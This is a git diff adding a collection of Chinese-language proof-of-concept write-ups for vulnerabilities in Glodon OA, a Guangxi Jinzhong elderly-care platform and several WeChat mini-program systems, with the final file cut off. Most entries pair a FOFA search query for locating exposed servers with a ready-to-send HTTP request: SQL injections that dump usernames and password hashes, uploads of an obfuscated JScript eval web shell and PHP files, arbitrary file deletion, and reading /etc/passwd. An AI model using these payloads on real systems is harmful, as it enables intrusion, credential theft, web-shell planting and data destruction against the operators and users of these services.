diff --git a/广联达oa-sql注入漏洞-.md b/广联达oa-sql注入漏洞-.md
new file mode 100644
index 0000000..1d07277
--- /dev/null
+++ b/广联达oa-sql注入漏洞-.md
@@ -0,0 +1,17 @@
+## 广联达oa sql注入漏洞 POC
+```
+POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
+Host: xxx.com
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: 
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 88
+
+dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
+```
diff --git a/广联达oa-后台文件上传漏洞.md b/广联达oa-后台文件上传漏洞.md
new file mode 100644
index 0000000..2018271
--- /dev/null
+++ b/广联达oa-后台文件上传漏洞.md
@@ -0,0 +1,32 @@
+## 广联达oa 后台文件上传漏洞
+
+```
+POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
+Host: 10.10.10.1:8888
+X-Requested-With: Ext.basex
+Accept: text/html, application/xhtml+xml, image/jxr, */*
+Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
+Accept: */*
+Origin: http://10.10.10.1
+Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
+Cookie: 
+Connection: close
+Content-Length: 421
+
+------WebKitFormBoundaryFfJZ4PlAZBixjELj
+Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
+Content-Type: application/text
+
+<%@ Page Language="Jscript" Debug=true%>
+<%
+var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';
+var GFMA=Request.Form("qmq1");
+var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
+eval(GFMA, ONOQ);
+%>
+
+------WebKitFormBoundaryFfJZ4PlAZBixjELj--
+```
diff --git a/广西金中软件集团有限公司智慧医养服务平台DownFile存在任意文件删除漏洞.md b/广西金中软件集团有限公司智慧医养服务平台DownFile存在任意文件删除漏洞.md
new file mode 100644
index 0000000..34b5504
--- /dev/null
+++ b/广西金中软件集团有限公司智慧医养服务平台DownFile存在任意文件删除漏洞.md
@@ -0,0 +1,44 @@
+# 广西金中软件集团有限公司智慧医养服务平台DownFile存在任意文件删除漏洞
+
+# 一、漏洞简介
+广西金中软件集团有限公司前身成立于1999年，隶属于广西电信下的三产公司——金中信息产业有限公司，是一家集软件开发、网站建设、网络工程、系统集成和维护服务、通信增值业务和ISP运营服务于一体的高科技IT企业。广西金中软件集团有限公司智慧医养服务平台DownFile存在任意文件删除漏洞。
+
+# 二、影响版本
++ 智慧医养服务平台
+
+# 三、资产测绘
++ fofa`body="Content/css/Login/images/gtx-main-bg00004.png"`
++ 特征
+
+![1721291803179-fa0d3eb8-c0c1-498b-929f-3a07eab9d2cc.png](./img/xow1UnbQOxtonEIR/1721291803179-fa0d3eb8-c0c1-498b-929f-3a07eab9d2cc-888430.png)
+
+# 四、漏洞复现
+1. 当前文件存在
+
+```plain
+/Content/Upload/202407/18/1.aspx
+```
+
+![1721304183404-85076103-3aca-4afb-8b6c-edf61a5f8dd5.png](./img/xow1UnbQOxtonEIR/1721304183404-85076103-3aca-4afb-8b6c-edf61a5f8dd5-791645.png)
+
+2. poc
+
+```plain
+GET /DevApi/DownFile?FileName=../Content/Upload/202407/18/1.aspx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+```
+
+![1721304206313-487befae-1b4b-4efe-a327-39177abf481e.png](./img/xow1UnbQOxtonEIR/1721304206313-487befae-1b4b-4efe-a327-39177abf481e-167095.png)
+
+3. 当前文件已被删除
+
+![1721304237409-e94de272-e4f1-44ee-acf4-e32bf23648ee.png](./img/xow1UnbQOxtonEIR/1721304237409-e94de272-e4f1-44ee-acf4-e32bf23648ee-178789.png)
+
+
+
+> 更新: 2024-10-22 09:37:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ip0u6yn44ecxty0g>
\ No newline at end of file
diff --git a/广西金中软件集团有限公司智慧医养服务平台UpLoaderAction存在任意文件上传漏洞.md b/广西金中软件集团有限公司智慧医养服务平台UpLoaderAction存在任意文件上传漏洞.md
new file mode 100644
index 0000000..3a55784
--- /dev/null
+++ b/广西金中软件集团有限公司智慧医养服务平台UpLoaderAction存在任意文件上传漏洞.md
@@ -0,0 +1,45 @@
+# 广西金中软件集团有限公司智慧医养服务平台UpLoaderAction存在任意文件上传漏洞
+
+# 一、漏洞简介
+广西金中软件集团有限公司前身成立于1999年，隶属于广西电信下的三产公司——金中信息产业有限公司，是一家集软件开发、网站建设、网络工程、系统集成和维护服务、通信增值业务和ISP运营服务于一体的高科技IT企业。广西金中软件集团有限公司智慧医养服务平台UpLoaderAction存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 智慧医养服务平台
+
+# 三、资产测绘
++ fofa`body="Content/css/Login/images/gtx-main-bg00004.png"`
++ 特征
+
+![1721291803179-fa0d3eb8-c0c1-498b-929f-3a07eab9d2cc.png](./img/9s3Ewn0Srh8yhvm0/1721291803179-fa0d3eb8-c0c1-498b-929f-3a07eab9d2cc-337432.png)
+
+# 四、漏洞复现
+```plain
+POST /DevApi/UpLoaderAction HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: */*
+Content-Type: multipart/form-data; boundary=---------------------------45250802924973458471174811279
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Length: 10338
+
+-----------------------------45250802924973458471174811279
+Content-Disposition: form-data; name="file"; filename="12.aspx"
+Content-Type: image/png
+
+132
+-----------------------------45250802924973458471174811279
+```
+
+![1721303068575-2999a4b5-ed33-4225-b812-be1fa319fa22.png](./img/9s3Ewn0Srh8yhvm0/1721303068575-2999a4b5-ed33-4225-b812-be1fa319fa22-013346.png)
+
+```plain
+/Content/Upload/202407/18/12.aspx
+```
+
+![1721303092824-5f8236cb-148a-443a-82dc-4f32b58cbf6d.png](./img/9s3Ewn0Srh8yhvm0/1721303092824-5f8236cb-148a-443a-82dc-4f32b58cbf6d-518228.png)
+
+
+
+> 更新: 2024-10-22 09:37:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rdeert6v3r8yl1kv>
\ No newline at end of file
diff --git a/广西金中软件集团有限公司智慧医养服务平台Uploader存在任意文件上传漏洞.md b/广西金中软件集团有限公司智慧医养服务平台Uploader存在任意文件上传漏洞.md
new file mode 100644
index 0000000..3c6433f
--- /dev/null
+++ b/广西金中软件集团有限公司智慧医养服务平台Uploader存在任意文件上传漏洞.md
@@ -0,0 +1,45 @@
+# 广西金中软件集团有限公司智慧医养服务平台Uploader存在任意文件上传漏洞
+
+# 一、漏洞简介
+广西金中软件集团有限公司前身成立于1999年，隶属于广西电信下的三产公司——金中信息产业有限公司，是一家集软件开发、网站建设、网络工程、系统集成和维护服务、通信增值业务和ISP运营服务于一体的高科技IT企业。广西金中软件集团有限公司智慧医养服务平台Uploader存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 智慧医养服务平台
+
+# 三、资产测绘
++ fofa`body="Content/css/Login/images/gtx-main-bg00004.png"`
++ 特征
+
+![1721291803179-fa0d3eb8-c0c1-498b-929f-3a07eab9d2cc.png](./img/jyyVjV_3Jtln2pe9/1721291803179-fa0d3eb8-c0c1-498b-929f-3a07eab9d2cc-698303.png)
+
+# 四、漏洞复现
+```plain
+POST /DevApi/Uploader HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: */*
+Content-Type: multipart/form-data; boundary=---------------------------45250802924973458471174811279
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Length: 10338
+
+-----------------------------45250802924973458471174811279
+Content-Disposition: form-data; name="file"; filename="1.aspx"
+Content-Type: image/png
+
+123
+-----------------------------45250802924973458471174811279
+```
+
+![1721291820700-2d586dfe-9e61-4b58-94da-3f3b67d8878c.png](./img/jyyVjV_3Jtln2pe9/1721291820700-2d586dfe-9e61-4b58-94da-3f3b67d8878c-790966.png)
+
+```plain
+/Content/Upload/202407/18/1.aspx
+```
+
+![1721291836932-3446c6bb-c27e-461f-a28a-c4e56ac1aa48.png](./img/jyyVjV_3Jtln2pe9/1721291836932-3446c6bb-c27e-461f-a28a-c4e56ac1aa48-000517.png)
+
+
+
+> 更新: 2024-10-22 09:37:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/payri8rhhk98f9mm>
\ No newline at end of file
diff --git a/广西金中软件集团有限公司智慧医养服务平台Uploads存在任意文件上传漏洞.md b/广西金中软件集团有限公司智慧医养服务平台Uploads存在任意文件上传漏洞.md
new file mode 100644
index 0000000..c3b046c
--- /dev/null
+++ b/广西金中软件集团有限公司智慧医养服务平台Uploads存在任意文件上传漏洞.md
@@ -0,0 +1,45 @@
+# 广西金中软件集团有限公司智慧医养服务平台Uploads存在任意文件上传漏洞
+
+# 一、漏洞简介
+广西金中软件集团有限公司前身成立于1999年，隶属于广西电信下的三产公司金中信息产业有限公司，是一家集软件开发、网站建设、网络工程、系统集成和维护服务、通信增值业务和ISP运营服务于一体的高科技IT企业。广西金中软件集团有限公司智慧医养服务平台Uploads存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 智慧医养服务平台
+
+# 三、资产测绘
++ fofa`body="Content/css/Login/images/gtx-main-bg00004.png"`
++ 特征
+
+![1721360047891-e62d7c12-039e-43ad-8463-3e0087883ef8.png](./img/XIEEraDWQdVmxuuv/1721360047891-e62d7c12-039e-43ad-8463-3e0087883ef8-966512.png)
+
+# 四、漏洞复现
+```plain
+POST /Mobile/Uploads HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
+Accept: */*
+Content-Type: multipart/form-data; boundary=---------------------------45250802924973458471174811279
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Length: 10338
+
+-----------------------------45250802924973458471174811279
+Content-Disposition: form-data; name="file"; filename="1.aspx"
+Content-Type: image/png
+
+123
+-----------------------------45250802924973458471174811279
+```
+
+![1721304072527-78dbd3c0-d0a2-4a1d-bbee-3a1e27a608a9.png](./img/XIEEraDWQdVmxuuv/1721304072527-78dbd3c0-d0a2-4a1d-bbee-3a1e27a608a9-110706.png)
+
+```plain
+/Content/Upload/202407/18/1.aspx
+```
+
+![1721304088397-88650e4e-ebe2-4763-ba53-e8f0a3876899.png](./img/XIEEraDWQdVmxuuv/1721304088397-88650e4e-ebe2-4763-ba53-e8f0a3876899-182681.png)
+
+
+
+> 更新: 2024-10-22 09:37:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/im0lesizs3g3753g>
\ No newline at end of file
diff --git a/微信万能门店小程序系统_requestPost存在任意文件读取漏洞.md b/微信万能门店小程序系统_requestPost存在任意文件读取漏洞.md
new file mode 100644
index 0000000..0596a70
--- /dev/null
+++ b/微信万能门店小程序系统_requestPost存在任意文件读取漏洞.md
@@ -0,0 +1,21 @@
+# 微信万能门店小程序系统_requestPost存在任意文件读取漏洞
+万能门店微信小程序不限制小程序生成数量，支持多页面，预约功能等。 本套源码包含多商户插件、点餐插件、拼团插件、积分兑换、小程序手机客服等全套十个插件模块。支持后台一键扫码上传小程序，和后台通用模板。微信万能门店小程序系统存在任意文件读取漏洞
+
+## fofa
+```javascript
+"/comhome/cases/index.html" 
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1732115890021-a19be87f-f478-4ee9-971e-bdbeb555e80f.png)
+
+## poc
+```java
+GET /api/wxapps/_requestPost?url=file:///etc/passwd&data=1 HTTP/2
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1732115844099-9921c837-e60b-49bb-abba-ee32694c6075.png)
+
diff --git a/微信万能门店小程序系统存在SQL注入漏洞.md b/微信万能门店小程序系统存在SQL注入漏洞.md
new file mode 100644
index 0000000..89cd99a
--- /dev/null
+++ b/微信万能门店小程序系统存在SQL注入漏洞.md
@@ -0,0 +1,34 @@
+# 微信万能门店小程序系统存在SQL注入漏洞
+
+# 一、漏洞简介
+万能门店微信小程序不限制小程序生成数量，支持多页面，预约功能等。 本套源码包含多商户插件、点餐插件、拼团插件、积分兑换、小程序手机客服等全套十个插件模块。支持后台一键扫码上传小程序，和后台通用模板。微信万能门店小程序系统存在SQL注入漏洞
+
+# 二、影响版本
++ 微信万能门店小程序系统
+
+# 三、资产测绘
++ fofa`<font style="color:rgb(221, 17, 68);">"/comhome/cases/index.html"</font>`
++ 特征
+
+![1732115890021-a19be87f-f478-4ee9-971e-bdbeb555e80f.png](./img/mzSFGhMGF76yKh7v/1732115890021-a19be87f-f478-4ee9-971e-bdbeb555e80f-603008.png)
+
+# 四、漏洞复现
+```java
+POST /api/wxapps/doPageGetFormList HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+ 
+suid=' AND GTID_SUBSET(CONCAT((SELECT (VERSION()))),1)-- bdmV
+```
+
+![1732589208600-f4a25dbf-20d0-4c2d-b78f-6fb8415535e0.png](./img/mzSFGhMGF76yKh7v/1732589208600-f4a25dbf-20d0-4c2d-b78f-6fb8415535e0-164809.png)
+
+
+
+> 更新: 2024-11-27 10:00:05  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pg8al3o5uwx56x74>
\ No newline at end of file
diff --git a/微信万能门店小程序系统存在任意文件读取漏洞.md b/微信万能门店小程序系统存在任意文件读取漏洞.md
new file mode 100644
index 0000000..5b7794d
--- /dev/null
+++ b/微信万能门店小程序系统存在任意文件读取漏洞.md
@@ -0,0 +1,29 @@
+# 微信万能门店小程序系统存在任意文件读取漏洞
+
+# 一、漏洞简介
+万能门店微信小程序不限制小程序生成数量，支持多页面，预约功能等。 本套源码包含多商户插件、点餐插件、拼团插件、积分兑换、小程序手机客服等全套十个插件模块。支持后台一键扫码上传小程序，和后台通用模板。微信万能门店小程序系统存在任意文件读取漏洞
+
+# 二、影响版本
++ 微信万能门店小程序系统
+
+# 三、资产测绘
++ fofa`<font style="color:rgb(221, 17, 68);">"/comhome/cases/index.html"</font>`
++ 特征
+
+![1732115890021-a19be87f-f478-4ee9-971e-bdbeb555e80f.png](./img/QNp7Kijf56GcPlTN/1732115890021-a19be87f-f478-4ee9-971e-bdbeb555e80f-733822.png)
+
+# 四、漏洞复现
+```java
+GET /api/wxapps/_requestPost?url=file:///etc/passwd&data=1 HTTP/2
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+```
+
+![1732115844099-9921c837-e60b-49bb-abba-ee32694c6075.png](./img/QNp7Kijf56GcPlTN/1732115844099-9921c837-e60b-49bb-abba-ee32694c6075-869334.png)
+
+
+
+> 更新: 2024-11-27 10:00:05  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aaxfs0symbpmcbdz>
\ No newline at end of file
diff --git a/微信公众号商家收银台小程序系统存在任意文件上传漏洞.md b/微信公众号商家收银台小程序系统存在任意文件上传漏洞.md
new file mode 100644
index 0000000..6bc24fe
--- /dev/null
+++ b/微信公众号商家收银台小程序系统存在任意文件上传漏洞.md
@@ -0,0 +1,44 @@
+# 微信公众号商家收银台小程序系统存在任意文件上传漏洞
+
+# 一、漏洞简介
+微信公众号商家收银台小程序系统支持创建多个店铺，各个店铺自定义不同自定义表单。通过自定义表单实现订单自定义明细通过店铺自定义表单可以轻松建立，快捷收款、微信收银台、面对面收款、商品预约预订等扫码微信支付， 提升客户服务体验，商户快速获得精准订单数据，实现账款统计。通过打开自定义的表单页面，输入自定义的指定信息，可以实现订单收款。微信公众号商家收银台小程序系统存在任意文件上传漏洞
+
+# 二、影响版本
++ 微信公众号商家收银台小程序系统
+
+# 三、资产测绘
++ fofa`"/index.php?s=platform/index/captcha"`
++ 特征
+
+![1731657982176-e98cf239-3363-4fda-acae-1352213c1ab1.png](./img/AtWHBbxuCPyxXRL2/1731657982176-e98cf239-3363-4fda-acae-1352213c1ab1-534279.png)
+
+# 四、漏洞复现
+```java
+POST /library/deep/upload.iframe.php?action=add&MaxSize=&FileType=php&savePath=&backIdName=&saveName=0 HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywb0ftWeTnkfnoTM2
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Connection: close
+
+------WebKitFormBoundarywb0ftWeTnkfnoTM2
+Content-Disposition: form-data; name="uploadFileName"; filename="666.php"
+Content-Type: image/png
+
+<?php phpinfo();?>
+------WebKitFormBoundarywb0ftWeTnkfnoTM2--
+```
+
+![1731658001998-f0527e68-1902-40db-929e-663a87bcc843.png](./img/AtWHBbxuCPyxXRL2/1731658001998-f0527e68-1902-40db-929e-663a87bcc843-175902.png)
+
+```java
+data/uploadfile//20241115155925921.php
+```
+
+![1731658141195-9405c9d5-ac3c-455b-a5a9-5508648a8138.png](./img/AtWHBbxuCPyxXRL2/1731658141195-9405c9d5-ac3c-455b-a5a9-5508648a8138-423896.png)
+
+
+
+> 更新: 2024-11-27 10:00:07  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hbg0ot1kcqatcxhr>
\ No newline at end of file
diff --git a/微信公众号商家收银台小程序系统存在前台SQL注入漏洞.md b/微信公众号商家收银台小程序系统存在前台SQL注入漏洞.md
new file mode 100644
index 0000000..de18962
--- /dev/null
+++ b/微信公众号商家收银台小程序系统存在前台SQL注入漏洞.md
@@ -0,0 +1,19 @@
+# 微信公众号商家收银台小程序系统存在前台SQL注入漏洞
+
+微信公众号商家收银台小程序系统存在前台SQL注入漏洞，/system/platform/controller/index.php 登录控制器中的api_login_check 方法，通过POST传入username,password,code 三个参数之后直接进入到SQL查询中，且未有任何过滤，导致漏洞产生。
+
+## fofa
+
+```javascript
+"/index.php?s=platform/index/captcha"
+```
+
+## poc
+
+```javascript
+1' OR 1=1 OR '1'='1
+```
+
+![d1c295315cc728f91214a29ba6a8c463](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141432533.jpg)
+
+![98204052f465039cbf5a08afb6382c71](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141432078.jpg)
\ No newline at end of file
diff --git a/微信公众号小说漫画系统Upload存在任意文件写入漏洞.md b/微信公众号小说漫画系统Upload存在任意文件写入漏洞.md
new file mode 100644
index 0000000..ca978c8
--- /dev/null
+++ b/微信公众号小说漫画系统Upload存在任意文件写入漏洞.md
@@ -0,0 +1,53 @@
+# 微信公众号小说漫画系统Upload存在任意文件写入漏洞
+
+# 一、漏洞简介
+微信公众号小说漫画系统前台任意文件写入漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+# 二、影响版本
++ 微信公众号小说漫画系统
+
+# 三、资产测绘
++ fofa`"/Public/home/mhjs/jquery.js"`
++ 特征
+
+![1728355919795-a0aaf6bf-ee63-459d-998f-cf682a606504.png](./img/8LunnYa6EiTNHnHX/1728355919795-a0aaf6bf-ee63-459d-998f-cf682a606504-753828.png)
+
+# 四、漏洞复现
+```java
+POST /index.php?m=&c=IndexAjax&a=Upload HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cache-Control: no-cache
+Connection: keep-alive
+Content-Length: 78
+Content-Type: application/x-www-form-urlencoded
+Cookie: PHPSESSID=bf13e78oe1uqp8nh3crld1gu55; uloginid=107639
+Host: 
+Origin: http://xxx
+Pragma: no-cache
+Referer: http://xx/index.php?m=&c=IndexAjax
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
+sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+
+img=data:image/php;base64,YTw/cGhwIHBocGluZm8oKTs/Pg==&size=50
+```
+
+![1728355603282-a1e4392b-95c9-483f-9f2c-eb13b14f4231.png](./img/8LunnYa6EiTNHnHX/1728355603282-a1e4392b-95c9-483f-9f2c-eb13b14f4231-087530.png)
+
+```java
+https://xxx/Upload/20241008/104249_499.php
+```
+
+![1728355659763-20f11b95-adef-4522-8035-d2c07d3d39d2.png](./img/8LunnYa6EiTNHnHX/1728355659763-20f11b95-adef-4522-8035-d2c07d3d39d2-906388.png)
+
+
+
+> 更新: 2024-10-22 09:36:08  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gzk5f87zuin8ipgr>
\ No newline at end of file
diff --git a/微信公众号小说漫画系统fileupload.php存在任意文件写入漏洞.md b/微信公众号小说漫画系统fileupload.php存在任意文件写入漏洞.md
new file mode 100644
index 0000000..8b40429
--- /dev/null
+++ b/微信公众号小说漫画系统fileupload.php存在任意文件写入漏洞.md
@@ -0,0 +1,59 @@
+# 微信公众号小说漫画系统fileupload.php存在任意文件写入漏洞
+
+# 一、漏洞简介
+微信公众号小说漫画系统前台任意文件写入漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+# 二、影响版本
++ 微信公众号小说漫画系统
+
+# 三、资产测绘
++ fofa`"/Public/home/mhjs/jquery.js"`
++ 特征
+
+![1728355919795-a0aaf6bf-ee63-459d-998f-cf682a606504.png](./img/h9AsBQFbBcBeN3KH/1728355919795-a0aaf6bf-ee63-459d-998f-cf682a606504-839533.png)
+
+# 四、漏洞复现
+```java
+POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cache-Control: no-cache
+Connection: keep-alive
+Content-Length: 197
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAW4kl2MUmkWNAgBW
+Cookie: PHPSESSID=bf13e78oe1uqp8nh3crld1gu55; curIndex=3; uloginid=586639
+Host: 
+Origin: http://127.0.0.1
+Pragma: no-cache
+Referer: http://127.0.0.1/Public/webuploader/0.1.5/server/fileupload.php
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
+sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+sec-fetch-user: ?1
+
+------WebKitFormBoundary03rNBzFMIytvpWhy
+Content-Disposition: form-data; name="file"; filename="1.php"
+Content-Type: image/jpeg
+
+<?php phpinfo();?>
+------WebKitFormBoundary03rNBzFMIytvpWhy--
+```
+
+![1728355990707-baedf5e1-b865-479c-903d-403c1ca429a2.png](./img/h9AsBQFbBcBeN3KH/1728355990707-baedf5e1-b865-479c-903d-403c1ca429a2-058538.png)
+
+```java
+/Public/webuploader/0.1.5/server/upload/1.php
+```
+
+![1728355944065-0efedece-c38f-4038-beea-49bfae18cda9.png](./img/h9AsBQFbBcBeN3KH/1728355944065-0efedece-c38f-4038-beea-49bfae18cda9-113841.png)
+
+
+
+> 更新: 2024-10-22 09:36:08  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ogfflvncv70d9ms4>
\ No newline at end of file
diff --git a/微信公众号小说漫画系统fileupload.php存在前台任意文件上传漏洞.md b/微信公众号小说漫画系统fileupload.php存在前台任意文件上传漏洞.md
new file mode 100644
index 0000000..5a185d0
--- /dev/null
+++ b/微信公众号小说漫画系统fileupload.php存在前台任意文件上传漏洞.md
@@ -0,0 +1,48 @@
+# 微信公众号小说漫画系统前台任意文件写入漏洞
+
+微信公众号小说漫画系统前台任意文件写入漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+"/Public/home/mhjs/jquery.js"
+```
+
+## poc
+
+```javascript
+POST /index.php?m=&c=IndexAjax&a=Upload HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cache-Control: no-cache
+Connection: keep-alive
+Content-Length: 78
+Content-Type: application/x-www-form-urlencoded
+Cookie: PHPSESSID=bf13e78oe1uqp8nh3crld1gu55; uloginid=107639
+Host: 127.0.0.1
+Origin: http://127.0.0.1
+Pragma: no-cache
+Referer: http://127.0.0.1/index.php?m=&c=IndexAjax
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
+sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+​
+img=data:image/php;base64,YTw/cGhwIHBocGluZm8oKTs/Pg==&size=50
+```
+
+
+
+文件上传路径` /Public/webuploader/0.1.5/server/upload/1.php`
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/pJSx1c7kguryZs3x2KNpbQ
+
+
+
diff --git a/微信公众号小说漫画系统前台任意文件写入漏洞.md b/微信公众号小说漫画系统前台任意文件写入漏洞.md
new file mode 100644
index 0000000..99fcfb7
--- /dev/null
+++ b/微信公众号小说漫画系统前台任意文件写入漏洞.md
@@ -0,0 +1,44 @@
+# 微信公众号小说漫画系统前台任意文件写入漏洞
+
+微信公众号小说漫画系统前台任意文件写入漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+"/Public/home/mhjs/jquery.js"
+```
+
+## poc
+
+```javascript
